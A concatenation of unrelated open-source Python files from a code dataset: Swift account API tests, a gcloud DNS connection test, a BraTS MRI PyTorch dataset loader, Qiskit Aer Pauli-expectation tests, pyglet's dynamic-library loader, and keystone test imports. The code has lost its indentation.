resp, container_list = \
self.account_client.list_account_containers(params=params)
self.assertEqual(len(container_list), self.containers_count / 2 - 1)
@attr(type='smoke')
def test_list_containers_with_end_marker(self):
# list containers using end_marker param
# first expect to get 0 container as we specified first container as
# end_marker
# second expect to get the top half of the containers
params = {'end_marker': self.containers[0]}
resp, container_list = \
self.account_client.list_account_containers(params=params)
self.assertEqual(len(container_list), 0)
params = {'end_marker': self.containers[self.containers_count / 2]}
resp, container_list = \
self.account_client.list_account_containers(params=params)
self.assertEqual(len(container_list), self.containers_count / 2)
@attr(type='smoke')
def test_list_containers_with_limit_and_marker(self):
# list containers combining marker and limit param
# result are always limitated by the limit whatever the marker
for marker in random.choice(self.containers):
limit = random.randint(0, self.containers_count - 1)
params = {'marker': marker,
'limit': limit}
resp, container_list = \
self.account_client.list_account_containers(params=params)
self.assertLessEqual(len(container_list), limit)
@attr(type='smoke')
def test_list_account_metadata(self):
# list all account metadata
resp, metadata = self.account_client.list_account_metadata()
self.assertIn(int(resp['status']), HTTP_SUCCESS)
self.assertIn('x-account-object-count', resp)
self.assertIn('x-account-container-count', resp)
self.assertIn('x-account-bytes-used', resp)
@attr(type='smoke')
def test_create_and_delete_account_metadata(self):
header = 'test-account-meta'
data = 'Meta!'
# add metadata to account
resp, _ = self.account_client.create_account_metadata(
metadata={header: data})
self.assertIn(int(resp['status']), HTTP_SUCCESS)
resp, _ = self.account_client.list_account_metadata()
self.assertIn('x-account-meta-' + header, resp)
self.assertEqual(resp['x-account-meta-' + header], data)
# delete metadata from account
resp, _ = \
self.account_client.delete_account_metadata(metadata=[header])
self.assertIn(int(resp['status']), HTTP_SUCCESS)
resp, _ = self.account_client.list_account_metadata()
self.assertNotIn('x-account-meta-' + header, resp)
@attr(type=['negative', 'gate'])
def test_list_containers_with_non_authorized_user(self):
# list containers using non-authorized user
# create user
self.data.setup_test_user()
resp, body = \
self.token_client.auth(self.data.test_user,
self.data.test_password,
self.data.test_tenant)
new_token = \
self.token_client.get_token(self.data.test_user,
self.data.test_password,
self.data.test_tenant)
custom_headers = {'X-Auth-Token': new_token}
params = {'format': 'json'}
# list containers with non-authorized user token
self.assertRaises(exceptions.Unauthorized,
self.custom_account_client.list_account_containers,
params=params, metadata=custom_headers)
# delete the user which was created
self.data.teardown_all()
|
the-stack_0_6251 | # Copyright 2015 Google Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest2
class TestConnection(unittest2.TestCase):
def _getTargetClass(self):
from gcloud.dns.connection import Connection
return Connection
def _makeOne(self, *args, **kw):
return self._getTargetClass()(*args, **kw)
def test_build_api_url_no_extra_query_params(self):
conn = self._makeOne()
URI = '/'.join([
conn.API_BASE_URL,
'dns',
conn.API_VERSION,
'foo',
])
self.assertEqual(conn.build_api_url('/foo'), URI)
def test_build_api_url_w_extra_query_params(self):
from six.moves.urllib.parse import parse_qsl
from six.moves.urllib.parse import urlsplit
conn = self._makeOne()
uri = conn.build_api_url('/foo', {'bar': 'baz'})
scheme, netloc, path, qs, _ = urlsplit(uri)
self.assertEqual('%s://%s' % (scheme, netloc), conn.API_BASE_URL)
self.assertEqual(path,
'/'.join(['', 'dns', conn.API_VERSION, 'foo']))
parms = dict(parse_qsl(qs))
self.assertEqual(parms['bar'], 'baz')
|
the-stack_0_6253 | import os
import torch
import numpy as np
import SimpleITK as sitk
import random
from torch.utils.data import Dataset
class BraTS(Dataset):
def __init__(self, root, phase, desired_depth=128, desired_height=160, desired_width=192, normalize_flag=True,
scale_intensity_flag=False, shift_intesity_flag=False, flip_axes_flag=False):
self.root = root
self.patients = os.listdir(self.root)
self.patients = [x for x in self.patients if x.startswith('BraTS')]
self.flair_suffix = "_flair.nii.gz"
self.t1_suffix = "_t1.nii.gz"
self.t1ce_suffix = "_t1ce.nii.gz"
self.t2_suffix = "_t2.nii.gz"
self.seg_suffix = "_seg.nii.gz"
self.wt_suffix = "_contour_wt.nii.gz"
self.tc_suffix = "_contour_tc.nii.gz"
self.et_suffix = "_contour_et.nii.gz"
self.phase = phase
self.desired_depth = desired_depth
self.desired_height = desired_height
self.desired_width = desired_width
self.normalize_flag = normalize_flag
self.scale_intensity_flag = scale_intensity_flag
self.shift_intensity_flag = shift_intesity_flag
self.flip_axes_flag = flip_axes_flag
def __len__(self):
return len(self.patients)
def __getitem__(self, idx):
patient = self.patients[idx]
path_flair = os.path.join(self.root, patient, patient + self.flair_suffix)
path_t1 = os.path.join(self.root, patient, patient + self.t1_suffix)
path_t2 = os.path.join(self.root, patient, patient + self.t2_suffix)
path_t1ce = os.path.join(self.root, patient, patient + self.t1ce_suffix)
path_seg = os.path.join(self.root, patient, patient + self.seg_suffix)
path_contour_wt = os.path.join(self.root, patient, patient + self.wt_suffix)
path_contour_tc = os.path.join(self.root, patient, patient + self.tc_suffix)
path_contour_et = os.path.join(self.root, patient, patient + self.et_suffix)
mask, start_depth, start_height, start_width = self.get_mask_simple(path_seg)
out = self.get_volume(path_flair, path_t1, path_t2, path_t1ce, start_depth,
start_height, start_width)
contours = self.get_contours(path_contour_wt, path_contour_tc, path_contour_et, start_depth, start_height, start_width)
if self.flip_axes_flag:
dice = random.uniform(0, 1)
if dice > 0.5 and dice < 0.6:
mask = mask[:, ::-1, : , :].copy()
out = out[:, ::-1, : , :].copy()
contours = contours[:, ::-1, : , :].copy()
elif dice > 0.6 and dice < 0.7:
mask = mask[:, :, ::-1 , :].copy()
out = out[:, :, ::-1 , :].copy()
contours = contours[:, :, ::-1 , :].copy()
elif dice > 0.7 and dice < 0.8:
mask = mask[:, :, : , ::-1].copy()
out = out[:, :, : , ::-1].copy()
contours = contours[:, :, : , ::-1].copy()
elif dice > 0.8 and dice < 0.9:
mask = mask[:, :, ::-1 , ::-1].copy()
out = out[:, :, ::-1 , ::-1].copy()
contours = contours[:, :, ::-1 , ::-1].copy()
elif dice > 0.9 and dice < 1:
mask = mask[:, ::-1, ::-1 , ::-1].copy()
out = out[:, ::-1, ::-1 , ::-1].copy()
contours = contours[:, ::-1, ::-1 , ::-1].copy()
return torch.FloatTensor(out), torch.FloatTensor(mask), torch.FloatTensor(contours), patient
def get_contours(self, path_contour_wt, path_contour_tc, path_contour_et, start_depth, start_height, start_width):
depth = self.desired_depth
height = self.desired_height
width = self.desired_width
try:
contour_wt = sitk.GetArrayFromImage(sitk.ReadImage(path_contour_wt))[start_depth: start_depth + depth, start_height: start_height + height, start_width: start_width + width]
except Exception as e:
return np.zeros((self.desired_depth, self.desired_height, self.desired_width))
try:
contour_tc = sitk.GetArrayFromImage(sitk.ReadImage(path_contour_tc))[start_depth: start_depth + depth, start_height: start_height + height, start_width: start_width + width]
except Exception as e:
return np.zeros((self.desired_depth, self.desired_height, self.desired_width))
try:
contour_et = sitk.GetArrayFromImage(sitk.ReadImage(path_contour_et))[start_depth: start_depth + depth, start_height: start_height + height, start_width: start_width + width]
except Exception as e:
return np.zeros((self.desired_depth, self.desired_height, self.desired_width))
return np.stack((contour_wt, contour_tc, contour_et))
def normalize_one_volume(self, volume):
new_volume = np.zeros(volume.shape)
location = np.where(volume != 0)
mean = np.mean(volume[location])
var = np.std(volume[location])
new_volume[location] = (volume[location] - mean) / var
return new_volume
def merge_volumes(self, *volumes):
return np.stack(volumes, axis=0)
def shift_intensity(self, volume):
location = np.where(volume != 0)
minimum = np.min(volume[location])
maximum = np.max(volume[location])
std = np.std(volume[location])
value = np.random.uniform(low=-0.1 * std, high=0.1 * std, size=1)
volume[location] += value
volume[location][volume[location] < minimum] = minimum
volume[location][volume[location] > maximum] = maximum
return volume
def scale_intensity(self, volume):
location = np.where(volume != 0)
new_volume = np.zeros(volume.shape)
IntensityScale = np.random.uniform(0.9, 1, 1)
new_volume[location] = volume[location] * IntensityScale
return new_volume
def crop_volume(self, volume, start_depth, start_height, start_width):
### initial volumes are 155 X 240 X 240
depth = self.desired_depth
height = self.desired_height
width = self.desired_width
return volume[:, start_depth: start_depth + depth, start_height: start_height + height, start_width: start_width + width]
def get_volume(self, path_flair, path_t1, path_t2, path_t1ce, start_depth, start_height, start_width):
flair = sitk.GetArrayFromImage(sitk.ReadImage(path_flair))
t1 = sitk.GetArrayFromImage(sitk.ReadImage(path_t1))
t2 = sitk.GetArrayFromImage(sitk.ReadImage(path_t2))
t1ce = sitk.GetArrayFromImage(sitk.ReadImage(path_t1ce))
if self.desired_depth > 155:
flair = np.concatenate([flair, np.zeros((self.desired_depth - 155, 240, 240))], axis=0)
t1 = np.concatenate([t1, np.zeros((self.desired_depth - 155, 240, 240))], axis=0)
t2 = np.concatenate([t2, np.zeros((self.desired_depth - 155, 240, 240))], axis=0)
t1ce = np.concatenate([t1ce, np.zeros((self.desired_depth - 155, 240, 240))], axis=0)
if self.scale_intensity_flag:
flair = self.scale_intensity(flair)
t1 = self.scale_intensity(t1)
t2 = self.scale_intensity(t2)
t1ce = self.scale_intensity(t1ce)
if self.shift_intensity_flag:
flair = self.shift_intensity(flair)
t1 = self.shift_intensity(t1)
t2 = self.shift_intensity(t2)
t1ce = self.shift_intensity(t1ce)
if self.normalize_flag == True:
out = self.merge_volumes(self.normalize_one_volume(flair), self.normalize_one_volume(t2), self.normalize_one_volume(t1ce),
self.normalize_one_volume(t1))
else:
out = self.merge_volumes(flair, t2, t1ce, t1)
out = self.crop_volume(out, start_depth, start_height, start_width)
return out
def get_mask_simple(self, path_seg):
try:
seg = sitk.GetArrayFromImage(sitk.ReadImage(path_seg))
except Exception as e:
seg = np.zeros((155, 240, 240))
desired_depth = self.desired_depth
desired_height = self.desired_height
desired_width = self.desired_width
if desired_depth <= 155:
start_depth = np.random.randint(0, 156 - desired_depth)
to_add = 0
else:
start_depth = 0
to_add = desired_depth - 155
desired_depth = 155
start_height = np.random.randint(0, 241 - desired_height)
start_width = np.random.randint(0, 241 - desired_width)
end_depth = start_depth + desired_depth
end_height = start_height + desired_height
end_width = start_width + desired_width
if to_add != 0:
pad_seg = np.zeros((to_add, end_height - start_height, end_width - start_width))
new_seg = seg[start_depth: end_depth, start_height: end_height, start_width: end_width]
if to_add != 0:
new_seg = np.concatenate([new_seg, pad_seg], axis=0)
final_seg = np.zeros((3, ) + new_seg.shape)
final_seg[0, :, :, :][np.where(new_seg != 0)] = 1
final_seg[1, :, :, :][np.where((new_seg == 4) | (new_seg == 1))] = 1
final_seg[2, :, :, :][np.where(new_seg == 4)] = 1
return final_seg, start_depth, start_height, start_width
def get_mask(self, path_seg):
seg = sitk.GetArrayFromImage(sitk.ReadImage(path_seg))
location = np.where(seg != 0)
min_depth, max_depth = np.min(location[0]), np.max(location[0])
min_height, max_height = np.min(location[1]), np.max(location[1])
min_width, max_width = np.min(location[2]), np.max(location[2])
desired_depth = self.desired_depth
desired_height = self.desired_height
desired_width = self.desired_width
new_volume = np.zeros((desired_depth, desired_height, desired_width))
difference_depth = max_depth - min_depth
difference_height = max_height - min_height
difference_width = max_width - min_width
if difference_depth < desired_depth:
start_depth = np.random.randint(min_depth // 2, min_depth)
end_depth = min(start_depth + desired_depth, 155)
if end_depth == 155:
start_depth = end_depth - desired_depth
else:
dice = np.random.uniform(0, 1)
if dice > 0.5:
start_depth = min_depth
end_depth = start_depth + desired_depth
else:
end_depth = max_depth
start_depth = max_depth - desired_depth
if difference_height < desired_height:
start_height = np.random.randint(min_height // 2, min_height)
end_height = min(start_height + desired_height, 240)
if end_height == 240:
start_height = end_height - desired_height
else:
dice = np.random.uniform(0, 1)
if dice > 0.5:
start_height = min_height
end_height = start_height + desired_height
else:
end_height = max_height
start_height = max_height - desired_height
if difference_width < desired_width:
start_width = np.random.randint(min_width // 2, min_width)
end_width = min(start_width + desired_width, 240)
if end_width == 240:
start_width = end_width - desired_width
else:
dice = np.random.uniform(0, 1)
if dice > 0.5:
start_width = min_width
end_width = start_width + desired_width
else:
end_width = max_width
start_width = max_width - desired_width
new_seg = seg[start_depth: end_depth, start_height: end_height, start_width: end_width]
final_seg = np.zeros((3, ) + new_seg.shape)
final_seg[0, :, :, :][np.where(new_seg != 0)] = 1
final_seg[1, :, :, :][np.where((new_seg == 4) | (new_seg == 1))] = 1
final_seg[2, :, :, :][np.where(new_seg == 4)] = 1
return final_seg, start_depth, start_height, start_width |
the-stack_0_6257 | # This code is part of Qiskit.
#
# (C) Copyright IBM 2018, 2021.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
""" Test AerPauliExpectation """
import itertools
import unittest
from test.python.opflow import QiskitOpflowTestCase
import numpy as np
from qiskit.circuit.library import RealAmplitudes
from qiskit.opflow import (
CX,
AerPauliExpectation,
CircuitSampler,
CircuitStateFn,
H,
I,
ListOp,
Minus,
One,
PauliExpectation,
PauliSumOp,
Plus,
S,
StateFn,
X,
Y,
Z,
Zero,
)
from qiskit.utils import QuantumInstance
class TestAerPauliExpectation(QiskitOpflowTestCase):
"""Pauli Change of Basis Expectation tests."""
def setUp(self) -> None:
super().setUp()
try:
from qiskit import Aer
self.seed = 97
self.backend = Aer.get_backend("aer_simulator")
q_instance = QuantumInstance(
self.backend, seed_simulator=self.seed, seed_transpiler=self.seed
)
self.sampler = CircuitSampler(q_instance, attach_results=True)
self.expect = AerPauliExpectation()
except Exception as ex: # pylint: disable=broad-except
self.skipTest(f"Aer doesn't appear to be installed. Error: '{str(ex)}'")
return
def test_pauli_expect_pair(self):
"""pauli expect pair test"""
op = Z ^ Z
# wvf = (Pl^Pl) + (Ze^Ze)
wvf = CX @ (H ^ I) @ Zero
converted_meas = self.expect.convert(~StateFn(op) @ wvf)
sampled = self.sampler.convert(converted_meas)
self.assertAlmostEqual(sampled.eval(), 0, delta=0.1)
def test_pauli_expect_single(self):
"""pauli expect single test"""
paulis = [Z, X, Y, I]
states = [Zero, One, Plus, Minus, S @ Plus, S @ Minus]
for pauli, state in itertools.product(paulis, states):
converted_meas = self.expect.convert(~StateFn(pauli) @ state)
matmulmean = state.adjoint().to_matrix() @ pauli.to_matrix() @ state.to_matrix()
sampled = self.sampler.convert(converted_meas)
self.assertAlmostEqual(sampled.eval(), matmulmean, delta=0.1)
def test_pauli_expect_op_vector(self):
"""pauli expect op vector test"""
paulis_op = ListOp([X, Y, Z, I])
converted_meas = self.expect.convert(~StateFn(paulis_op))
plus_mean = converted_meas @ Plus
sampled_plus = self.sampler.convert(plus_mean)
np.testing.assert_array_almost_equal(sampled_plus.eval(), [1, 0, 0, 1], decimal=1)
minus_mean = converted_meas @ Minus
sampled_minus = self.sampler.convert(minus_mean)
np.testing.assert_array_almost_equal(sampled_minus.eval(), [-1, 0, 0, 1], decimal=1)
zero_mean = converted_meas @ Zero
sampled_zero = self.sampler.convert(zero_mean)
np.testing.assert_array_almost_equal(sampled_zero.eval(), [0, 0, 1, 1], decimal=1)
sum_zero = (Plus + Minus) * (0.5 ** 0.5)
sum_zero_mean = converted_meas @ sum_zero
sampled_zero_mean = self.sampler.convert(sum_zero_mean)
# !!NOTE!!: Depolarizing channel (Sampling) means interference
# does not happen between circuits in sum, so expectation does
# not equal expectation for Zero!!
np.testing.assert_array_almost_equal(sampled_zero_mean.eval(), [0, 0, 0, 1])
def test_pauli_expect_state_vector(self):
"""pauli expect state vector test"""
states_op = ListOp([One, Zero, Plus, Minus])
paulis_op = X
converted_meas = self.expect.convert(~StateFn(paulis_op) @ states_op)
sampled = self.sampler.convert(converted_meas)
# Small test to see if execution results are accessible
for composed_op in sampled:
self.assertTrue(hasattr(composed_op[0], "execution_results"))
np.testing.assert_array_almost_equal(sampled.eval(), [0, 0, 1, -1], decimal=1)
def test_pauli_expect_op_vector_state_vector(self):
"""pauli expect op vector state vector test"""
paulis_op = ListOp([X, Y, Z, I])
states_op = ListOp([One, Zero, Plus, Minus])
valids = [
[+0, 0, 1, -1],
[+0, 0, 0, 0],
[-1, 1, 0, -0],
[+1, 1, 1, 1],
]
converted_meas = self.expect.convert(~StateFn(paulis_op) @ states_op)
sampled = self.sampler.convert(converted_meas)
np.testing.assert_array_almost_equal(sampled.eval(), valids, decimal=1)
def test_multi_representation_ops(self):
"""Test observables with mixed representations"""
mixed_ops = ListOp([X.to_matrix_op(), H, H + I, X])
converted_meas = self.expect.convert(~StateFn(mixed_ops))
plus_mean = converted_meas @ Plus
sampled_plus = self.sampler.convert(plus_mean)
np.testing.assert_array_almost_equal(
sampled_plus.eval(), [1, 0.5 ** 0.5, (1 + 0.5 ** 0.5), 1], decimal=1
)
@unittest.skip("Skip until https://github.com/Qiskit/qiskit-aer/issues/1249 is closed.")
def test_parameterized_qobj(self):
"""grouped pauli expectation test"""
two_qubit_h2 = (
(-1.052373245772859 * I ^ I)
+ (0.39793742484318045 * I ^ Z)
+ (-0.39793742484318045 * Z ^ I)
+ (-0.01128010425623538 * Z ^ Z)
+ (0.18093119978423156 * X ^ X)
)
aer_sampler = CircuitSampler(
self.sampler.quantum_instance, param_qobj=True, attach_results=True
)
ansatz = RealAmplitudes()
ansatz.num_qubits = 2
observable_meas = self.expect.convert(StateFn(two_qubit_h2, is_measurement=True))
ansatz_circuit_op = CircuitStateFn(ansatz)
expect_op = observable_meas.compose(ansatz_circuit_op).reduce()
def generate_parameters(num):
param_bindings = {}
for param in ansatz.parameters:
values = []
for _ in range(num):
values.append(np.random.rand())
param_bindings[param] = values
return param_bindings
def validate_sampler(ideal, sut, param_bindings):
expect_sampled = ideal.convert(expect_op, params=param_bindings).eval()
actual_sampled = sut.convert(expect_op, params=param_bindings).eval()
self.assertTrue(
np.allclose(actual_sampled, expect_sampled),
f"{actual_sampled} != {expect_sampled}",
)
def get_circuit_templates(sampler):
return sampler._transpiled_circ_templates
def validate_aer_binding_used(templates):
self.assertIsNotNone(templates)
def validate_aer_templates_reused(prev_templates, cur_templates):
self.assertIs(prev_templates, cur_templates)
validate_sampler(self.sampler, aer_sampler, generate_parameters(1))
cur_templates = get_circuit_templates(aer_sampler)
validate_aer_binding_used(cur_templates)
prev_templates = cur_templates
validate_sampler(self.sampler, aer_sampler, generate_parameters(2))
cur_templates = get_circuit_templates(aer_sampler)
validate_aer_templates_reused(prev_templates, cur_templates)
prev_templates = cur_templates
validate_sampler(self.sampler, aer_sampler, generate_parameters(2)) # same num of params
cur_templates = get_circuit_templates(aer_sampler)
validate_aer_templates_reused(prev_templates, cur_templates)
def test_pauli_expectation_param_qobj(self):
"""Test PauliExpectation with param_qobj"""
q_instance = QuantumInstance(
self.backend, seed_simulator=self.seed, seed_transpiler=self.seed, shots=10000
)
qubit_op = (0.1 * I ^ I) + (0.2 * I ^ Z) + (0.3 * Z ^ I) + (0.4 * Z ^ Z) + (0.5 * X ^ X)
ansatz = RealAmplitudes(qubit_op.num_qubits)
ansatz_circuit_op = CircuitStateFn(ansatz)
observable = PauliExpectation().convert(~StateFn(qubit_op))
expect_op = observable.compose(ansatz_circuit_op).reduce()
params1 = {}
params2 = {}
for param in ansatz.parameters:
params1[param] = [0]
params2[param] = [0, 0]
sampler1 = CircuitSampler(backend=q_instance, param_qobj=False)
samples1 = sampler1.convert(expect_op, params=params1)
val1 = np.real(samples1.eval())[0]
samples2 = sampler1.convert(expect_op, params=params2)
val2 = np.real(samples2.eval())
sampler2 = CircuitSampler(backend=q_instance, param_qobj=True)
samples3 = sampler2.convert(expect_op, params=params1)
val3 = np.real(samples3.eval())
samples4 = sampler2.convert(expect_op, params=params2)
val4 = np.real(samples4.eval())
np.testing.assert_array_almost_equal([val1] * 2, val2, decimal=2)
np.testing.assert_array_almost_equal(val1, val3, decimal=2)
np.testing.assert_array_almost_equal([val1] * 2, val4, decimal=2)
def test_list_pauli_sum(self):
"""Test AerPauliExpectation for ListOp[PauliSumOp]"""
test_op = ListOp([PauliSumOp.from_list([("XX", 1), ("ZI", 3), ("ZZ", 5)])])
observable = AerPauliExpectation().convert(~StateFn(test_op))
self.assertIsInstance(observable, ListOp)
self.assertIsInstance(observable[0], CircuitStateFn)
self.assertTrue(observable[0].is_measurement)
def test_expectation_with_coeff(self):
"""Test AerPauliExpectation with coefficients."""
with self.subTest("integer coefficients"):
exp = 3 * ~StateFn(X) @ (2 * Minus)
target = self.sampler.convert(self.expect.convert(exp)).eval()
self.assertEqual(target, -12)
with self.subTest("complex coefficients"):
exp = 3j * ~StateFn(X) @ (2j * Minus)
target = self.sampler.convert(self.expect.convert(exp)).eval()
self.assertEqual(target, -12j)
if __name__ == "__main__":
unittest.main()
|
the-stack_0_6258 | # ----------------------------------------------------------------------------
# pyglet
# Copyright (c) 2006-2008 Alex Holkner
# Copyright (c) 2008-2020 pyglet contributors
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in
# the documentation and/or other materials provided with the
# distribution.
# * Neither the name of pyglet nor the names of its
# contributors may be used to endorse or promote products
# derived from this software without specific prior written
# permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
# ----------------------------------------------------------------------------
"""Functions for loading dynamic libraries.
These extend and correct ctypes functions.
"""
import os
import re
import sys
import ctypes
import ctypes.util
import pyglet
_debug_lib = pyglet.options['debug_lib']
_debug_trace = pyglet.options['debug_trace']
_is_pyglet_doc_run = getattr(sys, "is_pyglet_doc_run", False)
if pyglet.options['search_local_libs']:
script_path = pyglet.resource.get_script_home()
cwd = os.getcwd()
_local_lib_paths = [script_path, os.path.join(script_path, 'lib'), os.path.join(cwd, 'lib')]
if pyglet.compat_platform == 'win32':
os.environ["PATH"] += os.pathsep + os.pathsep.join(_local_lib_paths)
else:
_local_lib_paths = None
class _TraceFunction:
def __init__(self, func):
self.__dict__['_func'] = func
def __str__(self):
return self._func.__name__
def __call__(self, *args, **kwargs):
return self._func(*args, **kwargs)
def __getattr__(self, name):
return getattr(self._func, name)
def __setattr__(self, name, value):
setattr(self._func, name, value)
class _TraceLibrary:
def __init__(self, library):
self._library = library
print(library)
def __getattr__(self, name):
func = getattr(self._library, name)
f = _TraceFunction(func)
return f
if _is_pyglet_doc_run:
class LibraryMock:
"""Mock library used when generating documentation."""
def __getattr__(self, name):
return LibraryMock()
def __setattr__(self, name, value):
pass
def __call__(self, *args, **kwargs):
return LibraryMock()
class LibraryLoader:
platform = pyglet.compat_platform
# this is only for library loading, don't include it in pyglet.platform
if platform == 'cygwin':
platform = 'win32'
def load_library(self, *names, **kwargs):
"""Find and load a library.
More than one name can be specified, they will be tried in order.
Platform-specific library names (given as kwargs) are tried first.
Raises ImportError if library is not found.
"""
if _is_pyglet_doc_run:
return LibraryMock()
if 'framework' in kwargs and self.platform == 'darwin':
return self.load_framework(kwargs['framework'])
if not names:
raise ImportError("No library name specified")
platform_names = kwargs.get(self.platform, [])
if isinstance(platform_names, str):
platform_names = [platform_names]
elif type(platform_names) is tuple:
platform_names = list(platform_names)
if self.platform.startswith('linux'):
for name in names:
libname = self.find_library(name)
platform_names.append(libname or 'lib%s.so' % name)
platform_names.extend(names)
for name in platform_names:
try:
lib = ctypes.cdll.LoadLibrary(name)
if _debug_lib:
print(name)
if _debug_trace:
lib = _TraceLibrary(lib)
return lib
except OSError as o:
path = self.find_library(name)
if path:
try:
lib = ctypes.cdll.LoadLibrary(path)
if _debug_lib:
print(path)
if _debug_trace:
lib = _TraceLibrary(lib)
return lib
except OSError:
pass
elif self.platform == "win32" and o.winerror != 126:
raise ImportError("Unexpected error loading library %s: %s" % (name, str(o)))
raise ImportError('Library "%s" not found.' % names[0])
def find_library(self, name):
return ctypes.util.find_library(name)
@staticmethod
def load_framework(name):
raise RuntimeError("Can't load framework on this platform.")
class MachOLibraryLoader(LibraryLoader):
def __init__(self):
if 'LD_LIBRARY_PATH' in os.environ:
self.ld_library_path = os.environ['LD_LIBRARY_PATH'].split(':')
else:
self.ld_library_path = []
if _local_lib_paths:
# search first for local libs
self.ld_library_path = _local_lib_paths + self.ld_library_path
os.environ['LD_LIBRARY_PATH'] = ':'.join(self.ld_library_path)
if 'DYLD_LIBRARY_PATH' in os.environ:
self.dyld_library_path = os.environ['DYLD_LIBRARY_PATH'].split(':')
else:
self.dyld_library_path = []
if 'DYLD_FALLBACK_LIBRARY_PATH' in os.environ:
self.dyld_fallback_library_path = os.environ['DYLD_FALLBACK_LIBRARY_PATH'].split(':')
else:
self.dyld_fallback_library_path = [os.path.expanduser('~/lib'), '/usr/local/lib', '/usr/lib']
def find_library(self, path):
"""Implements the dylib search as specified in Apple documentation:
http://developer.apple.com/library/content/documentation/DeveloperTools/Conceptual/DynamicLibraries/100-Articles/DynamicLibraryUsageGuidelines.html
Before commencing the standard search, the method first checks
the bundle's ``Frameworks`` directory if the application is running
within a bundle (OS X .app).
"""
libname = os.path.basename(path)
search_path = []
if '.dylib' not in libname:
libname = 'lib' + libname + '.dylib'
# py2app support
if getattr(sys, 'frozen', None) == 'macosx_app' and 'RESOURCEPATH' in os.environ:
search_path.append(os.path.join(os.environ['RESOURCEPATH'],
'..',
'Frameworks',
libname))
# conda support
if os.environ.get('CONDA_PREFIX', False):
search_path.append(os.path.join(os.environ['CONDA_PREFIX'], 'lib', libname))
# pyinstaller.py sets sys.frozen to True, and puts dylibs in
# Contents/MacOS, which path pyinstaller puts in sys._MEIPASS
if (hasattr(sys, 'frozen') and hasattr(sys, '_MEIPASS') and
sys.frozen is True and pyglet.compat_platform == 'darwin'):
search_path.append(os.path.join(sys._MEIPASS, libname))
if '/' in path:
search_path.extend([os.path.join(p, libname) for p in self.dyld_library_path])
search_path.append(path)
search_path.extend([os.path.join(p, libname) for p in self.dyld_fallback_library_path])
else:
search_path.extend([os.path.join(p, libname) for p in self.ld_library_path])
search_path.extend([os.path.join(p, libname) for p in self.dyld_library_path])
search_path.append(path)
search_path.extend([os.path.join(p, libname) for p in self.dyld_fallback_library_path])
for path in search_path:
if os.path.exists(path):
return path
return None
@staticmethod
def load_framework(name):
path = ctypes.util.find_library(name)
# Hack for compatibility with macOS > 11.0
if path is None:
frameworks = {
'AGL': '/System/Library/Frameworks/AGL.framework/AGL',
'IOKit': '/System/Library/Frameworks/IOKit.framework/IOKit',
'OpenAL': '/System/Library/Frameworks/OpenAL.framework/OpenAL',
'OpenGL': '/System/Library/Frameworks/OpenGL.framework/OpenGL'
}
path = frameworks.get(name)
if path:
lib = ctypes.cdll.LoadLibrary(path)
if _debug_lib:
print(path)
if _debug_trace:
lib = _TraceLibrary(lib)
return lib
raise ImportError("Can't find framework %s." % name)
class LinuxLibraryLoader(LibraryLoader):
_ld_so_cache = None
_local_libs_cache = None
@staticmethod
def _find_libs(directories):
cache = {}
lib_re = re.compile(r'lib(.*)\.so(?:$|\.)')
for directory in directories:
try:
for file in os.listdir(directory):
match = lib_re.match(file)
if match:
# Index by filename
path = os.path.join(directory, file)
if file not in cache:
cache[file] = path
# Index by library name
library = match.group(1)
if library not in cache:
cache[library] = path
except OSError:
pass
return cache
def _create_ld_so_cache(self):
# Recreate search path followed by ld.so. This is going to be
# slow to build, and incorrect (ld.so uses ld.so.cache, which may
# not be up-to-date). Used only as fallback for distros without
# /sbin/ldconfig.
#
# We assume the DT_RPATH and DT_RUNPATH binary sections are omitted.
directories = []
try:
directories.extend(os.environ['LD_LIBRARY_PATH'].split(':'))
except KeyError:
pass
try:
with open('/etc/ld.so.conf') as fid:
directories.extend([dir.strip() for dir in fid])
except IOError:
pass
directories.extend(['/lib', '/usr/lib'])
self._ld_so_cache = self._find_libs(directories)
def find_library(self, path):
# search first for local libs
if _local_lib_paths:
if not self._local_libs_cache:
self._local_libs_cache = self._find_libs(_local_lib_paths)
if path in self._local_libs_cache:
return self._local_libs_cache[path]
# ctypes tries ldconfig, gcc and objdump. If none of these are
# present, we implement the ld-linux.so search path as described in
# the man page.
result = ctypes.util.find_library(path)
if result:
return result
if self._ld_so_cache is None:
self._create_ld_so_cache()
return self._ld_so_cache.get(path)
if pyglet.compat_platform == 'darwin':
loader = MachOLibraryLoader()
elif pyglet.compat_platform.startswith('linux'):
loader = LinuxLibraryLoader()
else:
loader = LibraryLoader()
load_library = loader.load_library
|
the-stack_0_6259 | import json
from lxml import etree
import unittest2 as unittest
from keystone.models import User
